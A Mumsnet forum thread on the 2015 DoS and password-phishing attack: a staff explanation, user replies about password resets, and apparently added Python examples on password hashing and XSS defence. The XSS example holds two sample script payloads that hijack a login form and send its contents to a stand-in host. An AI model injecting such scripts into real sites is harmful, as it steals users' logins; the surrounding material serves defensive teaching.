
More about the Technical side of the attacks on Mumsnet

720 replies

JustineMumsnet · 19/08/2015 11:17

Hi all,
There have been, understandably, a lot of questions about the tech side of the attack on Mumsnet, so here, courtesy of the tech team, is some more detail. We obviously do have to be a bit careful with the details because we don't want to give away information that could help other hackers. Whilst it's true that "security through obscurity" isn't real security, we have no wish to make it easier for a future attacker.

We've spent a lot of time since the attacks began proactively defending against them, minimising their impact and protecting against future attacks. With a busy site like Mumsnet there is a lot of information to go through. When we uncover a new snippet of information, perhaps a new suspicious user account, we have to go back to the start and reanalyze, so it can be slow going at times. We are working with our technology partners who have a lot of experience of these kinds of attacks and we have used lots of resources available to us.

Some aspects of our technology stack have already been extensively tested by external specialists. Some of our software code is quite old - nearly as old as Mumsnet itself - and things have moved on a lot over that time. However, we have a program of code review whereby all new code is checked by someone other than the person who created it. It's not perfect and everyone makes mistakes, but we take the quality of our code very seriously.

The Denial of Service (DoS) attack against Mumsnet was a heavy, sustained attack which initially overwhelmed our ability to respond to legitimate requests. Mumsnet might typically get something like 50-100 requests per second. During the attack we were getting around 17,000 requests per second. Each request carried more data than is normal as well.

The hacking attack on our website was separate from the DoS, though we believe perpetrated by the same person or people. We follow many of the industry's best practices, such as using HTTPS for our login pages, keeping our database separate from our cluster of web servers and not accessible from the internet, and so on. We don't necessarily use the same standards of security as say your online banking service might use, for example requiring multiple passwords or using two factor authentication. We try to balance security against usability and the sensitivity of the information we hold. After all, as pointed out by one of you in an earlier thread, the majority of information we have about a user is what that user publishes in Talk, which is there for all to see.

As has been mentioned several times, we keep our passwords encrypted and we use the recommended algorithms for this, with high "strength" settings. This means that if someone somehow obtained the password data from our database they wouldn't be able to make any use of them - they wouldn't work on our site or on any other site even if the user used the same password on that other site. This remains the case even for MNHQ staff; they cannot un-encrypt the passwords either.

We are now pretty confident it was a phishing attack. Phishing, where a hacker gets a user to enter their username and password into a form from which they can capture that information, fits all the data we have. The hacker doesn't need to decrypt anything, because they capture the password in the browser as it is entered (either by typing it, or if it was automatically remembered by the user's browser or password manager). The list of passwords that has been published includes some that users have identified as being ones that they've mistyped. Our database wouldn't have mistyped ones, only accurate ones, whereas those collected by recording what a user submits would and does contain errors.

It's not obvious how it has been conducted though. We have been able to create a proof of concept which shows that it could work, but that relies on some steps that would be difficult or virtually impossible for a hacker. Phishing attacks sometimes use social engineering to "trick" people into using the fake website rather than the real one, but again, for various reasons, we can rule some of these out. Other phishing attacks are more technical and use other means to get people to visit the fake page. One such example is Cross Site Scripting (XSS). XSS is ranked number three on the Open Web Application Security Project's top ten list of web site security problems. If the hacker can get the website to put his own code on pages which are to be viewed by other users, s/he can modify the page to redirect the login process to their own site, i.e. to a page which looks just like our login page but is actually recording the details and sending them to the hacker. Also possible, but even less likely, is modifying our login page to submit the details to the hacker as well as to us. If the hacker had gained access to our Content Management System he could have done the former, though not the latter. However, we record all changes that are made and there are no suspicious ones.

It's impossible for us to know how many users' passwords have been collected. It's a reasonable assumption, and our working one, that the passwords of everybody that has logged in since 6th August 2015, and possibly some time before that, have been collected.

In light of the attacks, we've bolstered some aspects of our security, particularly around our administrative functions. We have further changes planned and will be working on these in the coming days.

Forcing everyone to reset their password, as we have done, would render the list useless provided that users don't choose the same new password and they've not used the same username and password elsewhere.

Some users have questioned why certain other changes aren't being made already, such as a move to enforcing stricter passwords, which makes sense. However, given how crucial the part of our system that deals with passwords is, we have to be really cautious when making changes to it. We don't want to rush and end up creating bigger holes, but we will certainly take steps to encourage users to strengthen passwords as soon as practicable.

Any questions do post here - we'll answer as transparently as we can - bearing in mind the caveat about helping future hackers mentioned earlier.

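Two of the points in the post above can be shown together: that stored passwords are kept as salted, slow hashes which nobody, MNHQ staff included, can turn back into passwords, and that a list containing mistyped passwords cannot have come from that table, because the table only ever verifies the correct one. The following Python is an added example and is not Mumsnet's code. It assumes PBKDF2-HMAC-SHA256 from the standard library as the "recommended algorithm" (the post does not name the real one or its strength settings), and the user table and the "published list" are constructed for the illustration.

```python
import hashlib
import hmac
import os
from typing import Optional

# Illustrative "strength" setting. Kept modest so the example runs in a few seconds;
# production settings should be higher and reviewed periodically. PBKDF2 is assumed
# here only because it ships with Python; bcrypt, scrypt or Argon2 work the same way.
ITERATIONS = 100_000


def hash_password(password: str, salt: Optional[bytes] = None,
                  iterations: int = ITERATIONS) -> str:
    """Return a self-describing record: algorithm$iterations$salt$digest (hex fields)."""
    if salt is None:
        salt = os.urandom(16)  # per-user random salt: equal passwords give different records
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute the digest with the stored salt and iteration count; compare in constant time."""
    algo, iterations, salt_hex, digest_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError(f"unsupported record format: {algo}")
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                    bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(candidate, bytes.fromhex(digest_hex))


# Constructed user table (usernames and passwords are made up for this example).
USER_DB = {
    "alice": hash_password("correct horse battery"),
    "bob": hash_password("Tr0ub4dor&3"),
}

# Constructed "published list" of the kind the post describes: what a phishing page or
# injected script records at the moment of entry, typos included.
CAPTURED = [
    ("alice", "correct horse battery"),
    ("alice", "correct hrose battery"),   # mistyped, then corrected on the next attempt
    ("bob", "Tr0ub4dor&3"),
    ("bob", "Tr0ub4dor&"),                # enter pressed before the last character
]


def classify_captured(captured, user_db):
    """Label each captured pair by whether it verifies against the user's stored record."""
    results = []
    for username, password in captured:
        stored = user_db.get(username)
        if stored is None:
            verdict = "unknown_user"
        elif verify_password(password, stored):
            verdict = "matches_stored"
        else:
            verdict = "does_not_match"
        results.append((username, password, verdict))
    return results


def consistent_with_db_dump(captured, user_db) -> bool:
    """A list produced by cracking the hash table can only contain passwords that verify.
    Any entry for a known user that does not verify is evidence the list was captured at
    entry time instead. Caveat: a password changed after the capture also fails to verify,
    so check the timeline of resets before drawing the conclusion."""
    return all(verdict != "does_not_match"
               for _, _, verdict in classify_captured(captured, user_db))
```

The record format carries its own iteration count, so the count can be raised later and old records rehashed on the user's next successful login without a flag day; that is the caution about touching the password code that the post describes, made concrete.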
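The XSS scenario in the post, a hacker's script landing on a page that other users see and rewriting where the login form submits (or sending a copy of the details elsewhere), as an added example in Python that is not the site's code. The page template, the two payloads, the nonce handling and the phish.example hostname are all assumptions made for the illustration; the point is the difference between concatenating a post body into HTML and encoding it, with a nonce-based Content-Security-Policy as a second line of defence that blocks an injected inline script even if the encoding is missed somewhere.

```python
import html
import re
import secrets

# Constructed template: a post body rendered above the site's login form.
LOGIN_FORM = (
    '<form id="login" method="post" action="/login">'
    '<input name="username"><input name="password" type="password">'
    '<button>Sign in</button></form>'
)


def render_post_vulnerable(body: str) -> str:
    # The defect: user-supplied markup is concatenated straight into the page.
    return f'<div class="post">{body}</div>'


def render_post_escaped(body: str) -> str:
    # The fix: encode for the HTML text context, so the browser shows the payload as text.
    return f'<div class="post">{html.escape(body, quote=True)}</div>'


def render_page(render_post, post_body: str, nonce: str) -> str:
    """Page = one post + the login form + the site's own script, tagged with the CSP nonce."""
    return (
        "<html><body>"
        f"{render_post(post_body)}"
        f"{LOGIN_FORM}"
        f'<script nonce="{nonce}">/* site javascript */</script>'
        "</body></html>"
    )


# Constructed payloads for the two variants the post describes. Neither is taken from the
# attack; they only show the shape of the problem. phish.example is a reserved test domain.
REDIRECT_PAYLOAD = (
    '<script>document.getElementById("login").action="https://phish.example/login"</script>'
)
COPY_PAYLOAD = (
    '<script>document.getElementById("login").addEventListener("submit",function(e){'
    'fetch("https://phish.example/c",{method:"POST",body:new FormData(e.target)})})</script>'
)

SCRIPT_TAG_RE = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.I | re.S)


def scripts_in(page_html: str):
    """Return (attributes, body) for every script element in the rendered HTML."""
    return SCRIPT_TAG_RE.findall(page_html)


def scripts_blocked_by_csp(page_html: str, nonce: str):
    """Simulate a 'script-src nonce-...' policy: a browser runs only script elements carrying
    the response's nonce. Returns the bodies it would refuse to execute."""
    return [body for attrs, body in scripts_in(page_html) if f'nonce="{nonce}"' not in attrs]


def csp_header(nonce: str) -> str:
    """Header to send with the page. The nonce must be fresh and unpredictable per response;
    a fixed or guessable nonce can simply be copied into the injected tag."""
    return f"Content-Security-Policy: script-src 'nonce-{nonce}'; object-src 'none'"


def new_nonce() -> str:
    return secrets.token_urlsafe(16)
```

Output encoding is context-specific: html.escape is right for text between tags and for quoted attribute values, but content placed inside a script block, a URL or a CSS rule needs the encoder for that context, which is why a templating engine with auto-escaping is preferable to hand-built strings like the ones above.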
WicksEnd · 26/08/2015 12:19

It would be a good idea to have a web chat with MNHQ like they do with guests so we can ask all these questions and hopefully get some answers.

Garrick · 26/08/2015 12:34

No, I didn't know that, Sim. Thanks. It's just infuriating to see this casual mistakes being made over & over again, absolutely everywhere. I've given up fuming about it - well, almost. Well, a bit ... Wink

I have become the grumpy old woman muttering "People today wouldn't recognise diligence unless Starbucks sold it with chocolate sprinkles!" It's the 21st century equivalent of "They don't make 'em like they used to" ... which is also true.

Garrick · 26/08/2015 12:35

these casual mistakes, obvs. I've been infected with the slapdash!

Simurgh · 26/08/2015 12:56

Grin Wink Garrick

Maybe it's a little like the saying in that old John Wayne movie - 'If you saw them, they weren't Apaches!'.

The really bad guys don't want to make a big song and dance about things; they'd much rather - if they found a genuine weakness - sit on it and exploit it further. (Which gives an interesting perspective on Jeffrey and his fan club.) Too many senior executives of large companies seem to think that if everything is going 'normally' with IT, then everything is fine. I generally assume the worst, though - it's a bit like when the kids go quiet. That's when you start to worry.

Smile

Garrick · 26/08/2015 12:59

Yep, Sim, you are ABSOLUTELY RIGHT!!!!!!!

TheHoneyBadger · 26/08/2015 16:39

just popped back to see if there had finally been a decent response about our addresses etc.

securitylecturer · 26/08/2015 18:23

and have carried on using ebay (with frequent password changes, just in case.)

Ebay and Paypal offer a variety of 2FA solutions, but I don't think their heart's really in it. They'll sell you a "security key" which is a Vasco (I think) one time password generator, or there's an app you can run which does the same thing (to the point of having a Vasco serial number), or you can have a code SMS'd to your phone. But it's all a bit hidden away and they never really explain why you might want to do this or what benefits it offers.

00100001 · 26/08/2015 18:43

Pipbin · 26/08/2015 21:10

I can see you Binary.

bronya · 26/08/2015 21:15

How can I find out what password was posted with my username on that site? I last inputted it when I last changed username, and that was many months ago. Need to check it doesn't match anything else but hard to do without knowing what it was. If I change them all I will forget them. Too many new unique, strong passwords to change at once.

SouthWestmom · 26/08/2015 21:19

Ageing hippy - did you try Google?
This comes up

www.mumsnet.com/info/privacy-policy

Simurgh · 26/08/2015 21:24

It's a PITA, perhaps, but something you need to do bronya. Secure the relevant email(s) first and then work your way through the sites using each one's Forgotten Password routine if necessary. Once each account is secure, decide - at a little more leisute if you wish - if you want an account with the particular site and close accounts you don't need.

Simurgh · 26/08/2015 21:25

*leisure

bronya · 26/08/2015 21:56

I can't change my password here either. I can't find a forgotten password button!

Simurgh · 26/08/2015 22:04

They'll send a password reset email to your registered email, bronya, and you can use that. Look beneath the orange 'Sign in with Google' and you should see a short para which has a link to click to have an email sent. Click that and follow the instructions.

Simurgh · 26/08/2015 22:09

Sorry - I was using the routine I use. I forgot that there's a slightly new one for users who have had their passwords zapped in the reset. Have a read of this. (It's also at the top of the page - it's got the link in it for the password change.)

bronya · 26/08/2015 22:33

I gave up and asked to delete my registration. Will just read for a while. Didn't post that much anyway. Hope it is all fixed soon!

Simurgh · 26/08/2015 23:07

Hope to see you back in due course then. Smile

00100001 · 27/08/2015 07:05

pip can you?

blimey maybe MNHQ are just blind then ;)

Jasonandyawegunorts · 27/08/2015 07:41

Huh, who said that?

00100001 · 27/08/2015 07:50

If I'm invisible, I should use my super-power for Evil!

... I mean evil! whoops Blush

I meant to say Evil!

00100001 · 27/08/2015 07:50

...

Grin

TheHoneyBadger · 27/08/2015 09:38

i'm invisible too i guess.

KateSMumsnet · 27/08/2015 10:55

We're here! So sorry folks, know you've got a lot of questions that need addressing. We're working our way through the thread, trying to get to the bottom of everything - please bear with us.

SarahMumsnet · 27/08/2015 11:58

@00100001

Why is no-one from HQ commenting on the questions:
  1. were you or were you not made aware of this breach in the middle of July?

  2. why, after the previous hack, was security not tightened?

  3. why were admin passwords so very simple?

Hi 00100001

Sorry for the slow response; we're just getting back up to speed. In answer to your questions:

  1. we weren't aware of the breach in mid-July; it was only after the DDoS attack and hacking in August that we found out about it.

  2. had we known, we would of course have tightened security at the time, and informed all Mumsnet users about it

  3. You’re quite right: admin passwords should have been better. Conversations have been had, and internal security of every kind has been tightened up. While it’s worth bearing in mind that the initial hacking wasn’t performed via forcing/guessing passwords, it’s nevertheless been a salutary reminder for everyone to prioritise security when it comes to passwords, both on MN and elsewhere.